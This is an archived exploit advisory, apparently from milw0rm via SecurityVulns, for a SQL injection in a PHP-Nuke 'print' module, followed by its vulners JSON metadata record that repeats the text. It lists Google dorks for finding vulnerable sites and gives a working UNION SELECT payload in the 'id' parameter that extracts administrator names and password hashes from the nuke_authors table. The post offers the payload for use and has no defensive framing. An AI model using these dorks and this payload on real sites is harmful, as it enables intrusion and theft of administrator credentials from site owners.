###############################################################
#
# PHP-Nuke genaral print SQL Injection(id)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl:"modules.php?name"print
#
# DORK 2 : allinurl:"modules.php?name=Hikaye"
#
# DORK : allinurl:"modules.php?name=Fikralar"
#
# DORK : allinurl:"modules.php?name=bilgi"
#
################################################################
example
http://xxxx/modules.php?name=(xxx subject)&(subject)=exploit
you cant see print id on google becouse all system have secret print and this exploit working
simetimes but not always
EXPLOIT :
print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################
{"id": "SECURITYVULNS:DOC:19237", "bulletinFamily": "software", "title": "PHP-Nuke genaral print SQL Injection(id)", "description": "###############################################################\r\n# \r\n# PHP-Nuke genaral print SQL Injection(id)\r\n#\r\n###############################################################\r\n#\r\n# AUTHOR : S@BUN \r\n#\r\n# HOME : http://www.milw0rm.com/author/1334\r\n# \r\n# MAİL : hackturkiye.hackturkiye@gmail.com\r\n# \r\n################################################################\r\n# \r\n# DORK 1 : allinurl:"modules.php?name"print \r\n#\r\n# DORK 2 : allinurl:"modules.php?name=Hikaye"\r\n# \r\n# DORK : allinurl:"modules.php?name=Fikralar"\r\n#\r\n# DORK : allinurl:"modules.php?name=bilgi"\r\n#\r\n################################################################\r\n \r\n example\r\n\r\n http://xxxx/modules.php?name=(xxx subject)&(subject)=exploit\r\n\r\n you cant see print id on google becouse all system have secret print and this exploit working\r\nsimetimes but not always\r\n\r\n EXPLOIT : \r\n\r\nprint&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202\r\n\r\n\r\n################################################################\r\n# S@BUN i AM NOT HACKER S@BUN \r\n################################################################", "published": "2008-02-22T00:00:00", "modified": "2008-02-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19237", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:25", "edition": 1, "viewCount": 48, "enchantments": {"score": {"value": 2.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8711"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8711"]}]}, "exploitation": null, "vulnersScore": 2.0}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645653637}}